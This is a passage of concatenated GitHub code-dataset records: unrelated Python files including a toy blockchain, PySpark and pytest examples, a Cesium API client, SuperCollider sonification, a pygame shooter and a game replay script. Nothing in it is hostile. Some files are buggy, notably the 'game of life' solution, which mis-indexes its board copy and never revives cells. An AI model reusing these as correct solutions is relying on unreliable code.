returns of false?\n ## not entirely sure how this should look\n\n","repo_name":"UNC-CS350/CS350","sub_path":"Exercises/Results/jone2032/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42904485359","text":"\"\"\" timestamp examples from python do not include how to remove seconds and microseconds. found example on stackoverflow: https://stackoverflow.com/questions/3183707/stripping-off-the-seconds-in-datetime-python/3183720 \"\"\"\n\nimport hashlib\nfrom datetime import datetime\n\nclass Block:\n\n def __init__(self, timestamp, data, previous_hash=None):\n self.timestamp = self.__createTimeStamp(timestamp)\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.__calc_hash(timestamp,data)\n self.prev = None\n self.next = None\n\n\n def __createTimeStamp(self, currentTime):\n now_time = currentTime.replace(second=0, microsecond=0)\n return now_time\n\n def __calc_hash(self, timestamp, data):\n sha = hashlib.sha256()\n hash_str = data.encode('utf-8')\n hash_str += str(timestamp).encode('utf-8')\n sha.update(hash_str)\n\n return sha.hexdigest()\n \n\nclass BlockChain:\n def __init__(self, block=None):\n self.first = None\n self.last = None\n\n def addBlock(self, blockdata):\n head = self.first\n tail = self.last\n\n if head == None:\n new_block = Block(datetime.now(), blockdata)\n self.first = new_block\n self.last = new_block\n else:\n new_block = Block(datetime.now(), blockdata, tail.hash)\n tail.next = new_block\n new_block.prev = tail\n self.last = new_block\n \n def append(self, block):\n head = self.first\n tail = self.last\n\n if head == None:\n self.first = block\n self.last = block\n else:\n tail.next = block\n block.prev = tail\n block.previous_hash = tail.hash\n self.tail = block\n\n \n\ndata_to_hash = \"This is the data to hash\"\nstartBlock = Block(datetime.now(),data_to_hash, 0)\n\nchain1 = BlockChain()\nchain1.append(startBlock)\nprint(\"first test case\")\nprint(chain1)\nprint(chain1.first)\nchain1.addBlock(\"Hash me please\")\nprint(chain1.last)\n\nprint(\"second test case\")\nchain2 = 
BlockChain()\nprint(chain2)\nprint(chain2.first)\n\nprint(\"third test case\")\nblock3_test1 = Block(datetime.now(),data_to_hash)\nprint(block3_test1.timestamp)\nblock3_test2 = Block(datetime.now(),\"Third test case for same timestamp\")\nprint(block3_test2.timestamp)\nchain3 = BlockChain()\nchain3.append(block3_test1)\nchain3.append(block3_test2)\n","repo_name":"reaprman/Data-Struct-algo-nanodegree","sub_path":"proj2/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34103666076","text":"if __name__ == \"__main__\":\n\n \"\"\" Replacement for pyspark.shell \"\"\"\n\n import pyspark\n from pyspark.sql import SparkSession\n\n spark: SparkSession = SparkSession.builder.enableHiveSupport().getOrCreate()\n sc: pyspark.SparkContext = spark.sparkContext\n\n print(sc.getConf().getAll())\n df = spark.createDataFrame(\n [\n (1, \"foo\"), # create your data here, be consistent in the types.\n (2, \"bar\"),\n ],\n [\"id\", \"label\"] # add your column names here\n )\n df = spark.sql(\"select * from play_data.test_shubham\")\n df.show()\n","repo_name":"joshi95/Delta-Spark-On-Kubernetes","sub_path":"example/example-task.py","file_name":"example-task.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"29607818049","text":"import pytest\n\nfrom homework07.hw3 import tic_tac_toe_checker\n\ntest_data = [\n ([[\"0\", \"*\", \"0\"], [\"0\", \"*\", \"0\"], [\"*\", \"0\", \"*\"]], \"draw!\"),\n ([[\"-\", \"-\", \"o\"], [\"-\", \"o\", \"o\"], [\"x\", \"x\", \"x\"]], \"x wins!\"),\n ([[\"-\", \"-\", \"O\"], [\"-\", \"X\", \"O\"], [\"X\", \"O\", \"X\"]], \"unfinished!\"),\n]\n\nwrong_data = [\n ([[\"0\", \"*\", \"o\"], [\"0\", \"*\", \"0\"], [\"*\", \"0\", \"*\"]]),\n ([[\"-\", \"-\", \"o\"], [\"-\", \"o\", \"o\"], [\"x\", \"Xx\", \"x\"]]),\n ([[\"-\", \"1\", \"O\"], [\"z\", \"X\", \"R\"], [\"X\", \"b\", \"X\"]]),\n]\n\n\n@pytest.mark.parametrize(\"test_input, expected\", test_data)\ndef test_tic_tac_toe(test_input, expected):\n assert tic_tac_toe_checker(test_input) == expected\n\n\n@pytest.mark.parametrize(\"test_input\", wrong_data)\ndef test_tic_tac_toe_wrong_input(test_input):\n with pytest.raises(ValueError):\n tic_tac_toe_checker(test_input)\n","repo_name":"DmitriyReztsov/homework-repository","sub_path":"tests/homework07/test_hw3.py","file_name":"test_hw3.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28119645402","text":"import socket\n\ndef run_sockets(addr):\n\twith socket.socket() as s:\n\t\ts.connect(addr)\n\t\ts.sendall(b'hello world')\n\t\tdata = s.recv(1024)\n\t\tprint(data)\n\nfor i in range(7):\n\trun_sockets(('127.0.0.1',12345))\n\n\n","repo_name":"Touchfl0w/python_practices","sub_path":"advanced_grammer/practice21-30/practice24/p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42132285801","text":"class Solution:\n def gameOfLife(self, board: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n ROWS = len(board)\n COLUMS = len(board[0])\n directions = [[1, 0], [-1, 0], [0, 1], [0, -1],\n [1, 1], [-1, 1], [1, -1], [-1, -1]]\n copyboard = [[board[r][c] for c in range(ROWS)] for 
r in range(COLUMS)]\n\n for row in range(ROWS):\n for col in range(COLUMS):\n alive = 0\n for dr, dc in directions:\n r, c = row + dr, dc + col\n\n if r >= 0 and r < ROWS and c >= 0 and c < COLUMS and board[r][c] == 1:\n alive += 1\n\n if copyboard[row][col] == 1 and (alive < 2 or alive > 3):\n board[row][col] = 0\n if copyboard[row][col] == 0 and (alive >= 3):\n board[row][col] = 0\n","repo_name":"mdiallo98/python-dataStructures-Algos","sub_path":"QBank/game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"8355690940","text":"import logging\nfrom typing import Dict, Optional, Tuple\n\nfrom Exports.dtos import (\n ListExportsPathParams,\n ListExportsResponse,\n ExportAssetPathParams,\n ExportAssetRequest,\n ExportAssetResponse,\n GetExportStatusPathParams,\n GetExportStatusResponse,\n)\nfrom dtos import PaginationLinks\nfrom http_client import HTTPClientProtocol\n\nlogger = logging.getLogger(__name__)\n\n\nclass ExportsApiClient:\n def __init__(self, http_client: HTTPClientProtocol):\n self._http_client = http_client\n\n async def list_exports(\n self, path_params: ListExportsPathParams\n ) -> Tuple[ListExportsResponse, Optional[PaginationLinks]]:\n endpoint_url = f\"/v1/assets/{path_params.asset_id}/exports\"\n status, response_body, headers = await self._http_client.get(\n endpoint=endpoint_url, headers={}\n )\n pagination_links = await self._retrieve_pagination_links(dict(headers))\n list_exports_response = ListExportsResponse.parse_obj(response_body)\n return list_exports_response, pagination_links\n\n async def _retrieve_pagination_links(\n self, headers: Dict\n ) -> Optional[PaginationLinks]:\n try:\n link_header = headers[\"Link\"]\n except KeyError:\n logging.debug(\"`Link` header is NOT present in the response.`\")\n pagination_links = None\n else:\n logging.debug(\"`Link` header is present in the response.`\")\n pagination_links = PaginationLinks.from_header(link_header)\n return pagination_links\n\n async def export_asset(\n self, path_params: ExportAssetPathParams, request_body_dto: ExportAssetRequest\n ) -> ExportAssetResponse:\n endpoint_url = f\"/v1/assets/{path_params.asset_id}/exports\"\n headers = {\"Content-type\": \"application/json\"}\n request_body = request_body_dto.dict()\n\n status, response_body, headers = await self._http_client.post(\n endpoint=endpoint_url, headers=headers, data=request_body\n )\n export_asset_response = ExportAssetResponse.parse_obj(response_body)\n return export_asset_response\n\n async def get_export_status(\n self, path_params: GetExportStatusPathParams\n ) -> GetExportStatusResponse:\n endpoint_url = (\n f\"/v1/assets/{path_params.asset_id}/exports/{path_params.export_id}\"\n )\n status, response_body, headers = await self._http_client.get(\n endpoint=endpoint_url, headers={}\n )\n get_export_status = GetExportStatusResponse.parse_obj(response_body)\n return get_export_status\n","repo_name":"geo-haiku/cesium-ion-api-client","sub_path":"src/Exports/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12932941057","text":"from sys import stdin\n\ninput = stdin.readline\nl = set()\nfor _ in range(int(input())):\n l.add(input().rstrip())\nl = list(l)\nl.sort()\nl.sort(key=len)\nprint(*l, 
sep=\"\\n\")\n","repo_name":"ombe1229/study","sub_path":"acmicpc/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37554621340","text":"from supercollider import Synth, Server, Group, AudioBus\nimport numpy as np\nimport time\n\n\nglobal NOTESDICT\nNOTESDICT = {\"c\":\"amp1\", \"c#\":\"amp2\", \"d\":\"amp3\", \"d#\":\"amp4\", \"e\":\"amp5\", \"f\":\"amp6\", \"f#\":\"amp7\", \"g\":\"amp8\", \"g#\":\"amp9\", \"a\":\"amp10\", \"a#\":\"amp11\", \"b\":\"amp12\", \"new\":\"amp13\"}\nglobal FREQDICT\nFREQDICT = {\"c\":60, \"c#\":61, \"d\":62, \"d#\":63, \"e\":64, \"f\":65, \"f#\":66, \"g\":67, \"g#\":68, \"a\":69, \"a#\":70, \"b\":71}\nglobal EXAMPLE\nEXAMPLE = {\"l1\":\"amp1\", \"l2\":\"amp2\", \"l3\":\"amp3\", \"l4\":\"amp4\", \"l5\":\"amp5\", \"l6\":\"amp6\", \"l7\":\"amp7\", \"l8\":\"amp8\"}\n\ndef note_loudness(qd): # Deprecated --------------------\n global server\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"vqe_model1_son1\", args)\n loudnesses = [loudness]\n for lqd in qd:\n loudness = np.zeros(12)\n for j, f in lqd.items():\n intj = int(j, 2)\n for i in range(12):\n trig= (intj >> i) & 1\n if trig:\n loudness[i] += f\n for i, amp in enumerate(loudness):\n synth.set(labels[i], amp)\n loudnesses.append(loudness)\n time.sleep(0.2)\n\n# Mapping #1 - Simple additive synthesis\ndef note_loudness_multiple(loudnessstream):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\", \"amp13\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"vqe_model1_son1\", args)\n\n for state in loudnessstream:\n print(state)\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n time.sleep(0.03)\n# Mapping #1 - Simple additive synthesis\ndef note_loudness_multiple_8_qubits(loudnessstream):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"qubit_8\", args)\n\n for state in loudnessstream:\n print(state)\n for k, amp in state.items():\n synth.set(EXAMPLE[k], amp)\n time.sleep(0.03)\n\n# Mapping #5 - Atonal additive sysnthesis chords used in \"Rasgar, Saber\" (2023)\ndef note_loudness_multiple_rs(loudnessstream, expect_values):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n synth = Synth(server, \"vqe_son3\", args)\n\n for v, state in enumerate(loudnessstream):\n print(state)\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n synth.set(\"shift\", expect_values[v])\n time.sleep(0.05)\n\n# Mapping #3 - Mel-Filterbank Spectral Diffusion\ndef mel_filterbank_loudness_multiple(loudnessstream, inbufnum=12):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n args[\"bufnum\"] = 0\n args[\"inbufnum\"] = inbufnum\n synth = Synth(server, 
\"mel_fb_dif1\", args)\n\n for state in loudnessstream:\n print(state)\n #synth.set(\"gate\", 1)\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n #synth.set(\"gate\", 0)\n time.sleep(0.1)\n\n# Mapping #4 - Mel-Filterbank Spectral Diffusion with Pitchshift\ndef mel_filterbank_loudness_multiple_decoupled(loudnessstream, expect_values):\n global server, NOTESDICT\n\n\n labels = [\"amp1\", \"amp2\", \"amp3\", \"amp4\", \"amp5\", \"amp6\", \"amp7\", \"amp8\", \"amp9\", \"amp10\", \"amp11\", \"amp12\"]\n loudness = np.zeros(12)\n args = dict(zip(labels,loudness))\n args[\"bufnum\"] = 0\n args[\"inbufnum\"] = 12\n srcgroup = Group(server, action=1, target=1)\n fxgroup = Group(server, action=3, target=srcgroup.id)\n srcbus = AudioBus(server, 1)\n args[\"inbus\"] = srcbus.id\n synth = Synth(server, \"mel_fb_dif2\", args, target=fxgroup)\n #synth2 = Synth(server, \"input_signal2\", {\"bufnum\": 12, \"out\": srcbus.id}, target=srcgroup)\n\n for v, state in enumerate(loudnessstream):\n print(state)\n print(f\" shifted value: {(expect_values[v] - min(expect_values))}\")\n #synth.set(\"gate\", 1)\n shifted_value = (expect_values[v] - min(expect_values))\n for k, amp in state.items():\n synth.set(NOTESDICT[k], amp)\n sy = Synth(server, \"input_signal2\", {\"out\":srcbus.id}, target=srcgroup)\n #sy = Synth(server, \"input_signal3\", {\"bufnum\": 15, \"out\":srcbus.id, \"tgrate\":shifted_value}, target=srcgroup)\n #synth.set(\"gate\", 0)\n #time.sleep(0.3)\n\n# Mapping #2 - Pitchshifted Arpeggios instead of chords. Philip Glass vibes.\ndef note_cluster_intensity(loudnessstream, expect_values):\n global server\n\n for v, state in enumerate(loudnessstream):\n #print(state)\n sorted_state = dict(sorted(state.items(), key=lambda item: item[1]))\n print(sorted_state)\n print(f\" expected value: {expect_values[v]}\")\n print(f\" shifted value: {(expect_values[v] - min(expect_values))/100}\")\n shifted_value = (expect_values[v] - min(expect_values))/100\n for i, (k, amp) in enumerate(sorted_state.items()):\n sy = Synth(server, \"vqe_son2\", {\"note\": FREQDICT[k], \"amp\":amp})\n # sy = Synth(server, \"vqe_son2\", {\"note\": FREQDICT[k]+expect_values[v]-3, \"amp\":amp})\n time.sleep(0.005+shifted_value)\n #time.sleep(0.2)\n\n# Mapping #6 - Granular Synthesis Spatialization 4 qubits\ndef granular_triggers(loudnessstream, expect_values):\n global server\n\n\n labels = [\"s0\", \"s1\", \"s2\", \"s3\"]\n loudness = np.zeros(4)\n args = dict(zip(labels,loudness))\n\n synth = Synth(server, \"vqgrains\", args)\n\n for v, state in enumerate(loudnessstream):\n print(state)\n print(f\" shifted value: {(expect_values[v] - min(expect_values))}\")\n shifted_value = (expect_values[v] - min(expect_values))\n #shifted_value = -(shifted_value - max(expect_values)) #Uncomment to change shift direction\n for k, amp in state.items():\n synth.set(k, amp)\n synth.set(\"rate\", shifted_value+0.01)\n time.sleep(0.1)\n\n\n# Function called by the main script\ndef sonify(loudnessstream, expect_values, son_type=1):\n \n global server\n\n server = Server()\n # Parse mapping type\n if son_type == 1:\n note_loudness_multiple(loudnessstream)\n elif son_type == 2:\n note_cluster_intensity(loudnessstream, expect_values)\n elif son_type == 3:\n mel_filterbank_loudness_multiple(loudnessstream, inbufnum=14)\n elif son_type == 4:\n mel_filterbank_loudness_multiple_decoupled(loudnessstream, expect_values)\n elif son_type == 5:\n note_loudness_multiple_rs(loudnessstream, expect_values)\n elif son_type == 6:\n 
granular_triggers(loudnessstream, expect_values)\n elif son_type == 7:\n note_loudness_multiple_8_qubits(loudnessstream)\n\n# Ctrl - . equivalent to kill sounds in SC\ndef freeall():\n global server\n\n server._send_msg(\"/g_freeAll\", 0)\n","repo_name":"iccmr-quantum/VQH","sub_path":"sc_functions.py","file_name":"sc_functions.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32437628109","text":"import requests\n\n\ndef download_image(url, filename):\n response = requests.get(url)\n with open(f\"./images/{filename}\", \"wb\") as f:\n f.write(response.content)\n\n\ndef fetch_spacex_last_launch():\n url = \"https://api.spacexdata.com/v3/launches/latest\"\n spacex_response = requests.get(url)\n spacex_json = spacex_response.json()\n spacex_image_links = spacex_json[\"links\"][\"flickr_images\"]\n for picture_number, link in enumerate(spacex_image_links):\n spacex_picture_filename = f\"spacex{picture_number + 1}.jpg\"\n download_image(link, spacex_picture_filename)\n","repo_name":"tumkir/Space_Instagram","sub_path":"fetch_spacex.py","file_name":"fetch_spacex.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"736715259","text":"\"\"\"Class Alien\"\"\"\n\nimport pygame\nfrom pygame.sprite import Sprite\n\nimport os\n\n\nclass Alien(Sprite):\n \"\"\"Клас для керування космічним прибулцем.\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"Ініціалізація прибульця та його початкового положення\"\"\"\n super().__init__()\n self.screen = ai_game.screen\n self.settings = ai_game.settings\n\n # NOTE: Завантаження зображення корабля\n # image = pygame.image.load('images/alien_ship.png')\n\n resource_path = os.path.dirname(__file__)\n image_path = os.path.join(resource_path, 'images')\n image = pygame.image.load(os.path.join(image_path, 'alien_ship.png'))\n\n image = pygame.transform.scale(image, (46, 42))\n\n self.image = image\n self.rect = self.image.get_rect()\n\n # NOTE: Створення кожного нового корабля внизу по центру екрану\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n # NOTE: Збереження десяткового значення позиції корабля по горизонталі\n self.x = float(self.rect.x)\n\n def check_edges(self):\n \"\"\"\"Перевірка на досягнення краю екрана\"\"\"\n screen_rect = self.screen.get_rect()\n if self.rect.right >= screen_rect.right or self.rect.left <= 0:\n return True\n\n def update(self):\n \"\"\"Зміщення космічного корабля прибульця\"\"\"\n self.x += (self.settings.alien_speed *\n self.settings.fleet_direction)\n self.rect.x = self.x\n","repo_name":"Mellow88/Python_crash_course","sub_path":"alien_invasion/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9050122422","text":"import numpy as np\nimport tensorflow as tf\nimport os\nimport glob\nfrom tqdm import tqdm\n\ndef tf2npz(tf_path, export_folder='C:\\\\data\\\\test'):\n vid_ids = []\n labels = []\n mean_rgb = []\n mean_audio = []\n tf_basename = os.path.basename(tf_path)\n npz_basename = tf_basename[:-len('.tfrecord')] + '.npz'\n isTrain = '/test' not in tf_path\n\n for example in tf.python_io.tf_record_iterator(tf_path): \n tf_example = tf.train.Example.FromString(example).features\n vid_ids.append(tf_example.feature['video_id'].bytes_list.value[0].decode(encoding='UTF-8'))\n if 
isTrain:\n labels.append(np.array(tf_example.feature['labels'].int64_list.value))\n mean_rgb.append(np.array(tf_example.feature['mean_rgb'].float_list.value).astype(np.float16))\n mean_audio.append(np.array(tf_example.feature['mean_audio'].float_list.value).astype(np.float16))\n \n save_path = export_folder + '/' + npz_basename\n np.savez(save_path, \n rgb=np.array(mean_rgb), \n audio=np.array(mean_audio), \n ids=np.array(vid_ids),\n labels=labels\n )\n\nif __name__ == '__main__':\n from multiprocessing import Pool\n with Pool() as p:\n p.map(tf2npz, glob.glob('../input/test/*.tfrecord'))\n","repo_name":"mifril/kaggle_youtube_8m","sub_path":"yt8m_2017/tf2npz.py","file_name":"tf2npz.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37138534916","text":"import sys\nN, total = map(int, sys.stdin.readline().rstrip().split())\ncoin = [int(sys.stdin.readline().rstrip()) for _ in range(N)]\n\ncount = 0\nwhile total: # total 이 0미만 일때까지 반복\n if coin[-1] > total: # 가지고 있는 가장 큰 금액이 total보다 크면 그돈은 뺌\n coin.pop()\n else:\n count += total // coin[-1] # 아닌경우 total을 가장큰 금액 단위로 나눠줌\n total = total % coin[-1] # 몫은 동전 개수(count)이고 나머지는 total\n coin.pop() # 가진 동전 목록에서 빼줌\n\nprint(count)\n","repo_name":"wony5248/Daily_Study","sub_path":"Coding_Study/03-10/백준 11047 동전0 - greedy.py","file_name":"백준 11047 동전0 - greedy.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"4864326400","text":"from typing import Optional\n\nfrom torch import Tensor\nfrom yacs.config import CfgNode\n\nfrom SCT.datasets import GeneralDataset\nfrom SCT.evaluators import GeneralEvaluator\nfrom SCT.experiment.general_experiment import GeneralExperiment\nfrom SCT.models import GeneralModel\n\n\ndef make_experiment(\n cfg: CfgNode,\n dataset: GeneralDataset,\n model: GeneralModel,\n loss_weights: Tensor,\n val_evaluator: Optional[GeneralEvaluator],\n train_evaluator: Optional[GeneralEvaluator],\n) -> GeneralExperiment:\n training_name = cfg.training.name\n if training_name == \"normal\":\n return GeneralExperiment(\n cfg,\n dataset,\n model,\n loss_weights,\n val_evaluator=val_evaluator,\n train_evaluator=train_evaluator,\n )\n else:\n raise Exception(\"Invalid training name (%s)\" % training_name)\n","repo_name":"MohsenFayyaz89/SCT","sub_path":"src/SCT/experiment/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"81"} +{"seq_id":"6921807875","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nn = int(input())\nfor k in range(1, n+1):\n a1 = k*k\n a2 = a1 * (a1-1)//2\n if a2 > 2:\n a2 -= 4 * (k-1) * (k-2)\n print(a2)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"karan-ksrk/CSES-Problem-Set","sub_path":"007 Two Knights.py","file_name":"007 Two Knights.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12435253474","text":"'''\nEXERCÍCIO 24 - Faça um programa que simule uma calculadora. Devem ser efetuadas apenas operações de soma, subtração, multiplicação e divisão. O programa deve ler dois valores (operandos) e a operação a ser efetuada. 
Após o cálculo, o programa apresenta a resposta na tela.\n'''\n\nvalor1 = float(input('Digite o primeiro valor: '))\nvalor2 = float(input('Digite o segundo valor: '))\n\nprint('\\nOperações possíveis: \\nSOMA (+) \\nSUBTRAÇÃO (-) \\nMULTIPLICAÇÃO (*) \\nDIVISÃO (/)')\n\noperacao = input('\\nDigite o símbolo correspondente a operação que se deseja realizar: ')\n\nif operacao == '+' :\n resultado = valor1 + valor2\n print(f'\\nO resultado dessa soma é {resultado:.2f}.')\nelif operacao == '-' :\n resultado = valor1 - valor2\n print(f'\\nO resultado dessa subtração é {resultado:.2f}.')\nelif operacao == '*' :\n resultado = valor1 * valor2\n print(f'\\nO resultado dessa multiplicação é {resultado:.2f}.')\nelif operacao == '/' :\n resultado = valor1 / valor2\n print(f'\\nO resultado dessa divisão é {resultado:.2f}.')\nelse:\n print('\\nNão é possível realizar essa operação!')","repo_name":"joycecampelos/exercicios_python","sub_path":"exercicio24.py","file_name":"exercicio24.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73540123785","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .serializers import *\n# Create your views here.\n\ndef home(request):\n return render(request,'home.html')\n\ndef download(request, uid):\n return render(request,'download.html',context = {'uid':uid})\n\n# class HandleFileUpload(APIView):\n# def post(self,request):\n# try:\n# data = request.data\n# serializer = FileListSerializer(data=data)\n# if serializer.is_valid():\n# serializer.save()\n# print(serializer.data)\n# return Response({\n# 'status':200,\n# 'message':'files uploaded successfully',\n# 'data' : serializer.data\n# })\n\n# return Response({\n# 'status': 400,\n# 'message':'something went wrong',\n# 'data':serializer.errors\n# })\n# except Exception as e:\n# print(\"asish\",e)\n\nclass HandleFileUpload(APIView):\n def post(self, request):\n try:\n data = request.data\n serializer = FileListSerializer(data=data)\n if serializer.is_valid():\n folder = serializer.create(serializer.validated_data)['folder']\n return Response({\n 'status': 200,\n 'message': 'files uploaded successfully',\n 'data': {'folder': folder}\n })\n return Response({\n 'status': 400,\n 'message': 'something went wrong',\n 'data': serializer.errors\n })\n except Exception as e:\n print(\"asish\", e)\n","repo_name":"Asish-T-Babu/file_share","sub_path":"fileupload/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30253060369","text":"from django.conf.urls.defaults import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\nfrom account.form import ProfileForm\nfrom common.views import HomeView\n\nadmin.autodiscover()\nimport settings\n\nurlpatterns = patterns('',\n url(r'^$', RedirectView.as_view(url='discussion/discussions/default/inbox'), name='home'),\n url(r'^accounts/login/', 'account.views.login'),\n url(r'^accounts/logout/?$', 'django.contrib.auth.views.logout_then_login', name='logout'),\n url(r'^user/register/$', 'account.views.register'),\n url(r'^discussion/', include('discussion.urls')),\n url(r'^tag/', include('tags.urls')),\n url(r'^notifications/', include('notification.urls')),\n 
url(r'^admin/', include(admin.site.urls)),\n url(r'^selectable/', include('selectable.urls')),\n url('^profiles/edit', 'profiles.views.edit_profile', {'form_class': ProfileForm}),\n url(r'^profiles/', include('profiles.urls')),\n)\n","repo_name":"vtemian/aisec","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"35289391348","text":"from django import template\nfrom subprocess import Popen, PIPE\nfrom bs4 import BeautifulSoup\n\ntry:\n unicode_type = unicode\nexcept NameError:\n unicode_type = str\n\nregister = template.Library()\n\n@register.filter\ndef html2text(value):\n \"\"\"\n Pipes given HTML string into the text browser W3M, which renders it.\n Rendered text is grabbed from STDOUT and returned.\n \"\"\"\n try:\n cmd = \"w3m -dump -T text/html -O utf-8\"\n proc = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, universal_newlines=True)\n return proc.communicate(str(value))[0]\n except OSError:\n # something bad happened, so just return the input\n return value\n\n@register.filter\ndef extract_urllinks(value, template='%(text)s (%(url)s)'):\n '''\n Extract urls from links and put it to brackets after links. Useful for generating plain version of email body from html\n '''\n html = BeautifulSoup(value)\n for link in html.findAll('a'):\n text = ''.join(map(unicode_type, link.contents)).strip()\n if link.get('href') and link.get('href') != text:\n result = template % {\n 'text': text,\n 'url': link['href'].replace('\\n',''),\n }\n elif text:\n result = text\n\n link.replaceWith(result)\n return html\n","repo_name":"ramusus/django-email-html","sub_path":"email_html/templatetags/email_html.py","file_name":"email_html.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"23090477898","text":"from os.path import exists\nimport sys\nsys.path.insert(0, './src')\nfrom input import input_to, Get\nfrom village import Village\nimport time\nfrom game_constants import *\n\nt=0\n\nf_exist = exists(\"./replays/moves.txt\")\nif(not f_exist):\n print(\"No replays available!\")\n exit()\n\nf = open(\"./replays/moves.txt\", \"r\")\ntime_line = f.readline().strip()\nchar_flag = int(f.readline().strip())\n\nv1 = Village(VILLAGE_ROWS, VILLAGE_COLS, char_flag)\nv1.printVillage(t)\nprint(\"\\n\\n\")\n\nflag=0\n\nqueen_big_attack_flag = 0\n\nwhile(1):\n t+=1\n if(flag==0):\n time_line = f.readline().strip()\n if(time_line==\"\"):\n if(v1.game_end(t)==1):\n break\n else:\n print(\"Huh?\")\n break\n\n inps = input_to(Get) # This is here so as to prevent replay from instantly taking input\n if(t!=int(time_line)):\n flag = 1\n continue\n flag = 0\n \n inp = f.readline().strip()\n if(inp==\"\"):\n inp = ' '\n if(inp=='q'):\n break\n if(v1.game_end(t)==1):\n break\n\n if(queen_big_attack_flag==1):\n queen_big_attack_flag = 0\n v1.queen_attack(16, 9)\n\n if(v1.player.rage==1 and t-v1.player.prev_rage_time>=100):\n v1.player.rage = 0\n v1.player.prev_rage_time = t\n v1.printVillage(t)\n print(\"\\n\\n\")\n\n if(inp=='w' or inp=='s' or inp=='a' or inp=='d'):\n v1.player.move(inp)\n v1.player.prev_inp = inp\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp==' '):\n if(char_flag==0):\n v1.king_attack()\n elif(char_flag==1):\n v1.queen_attack(8, 5)\n v1.printVillage(t)\n print(\"\\n\\n\")\n 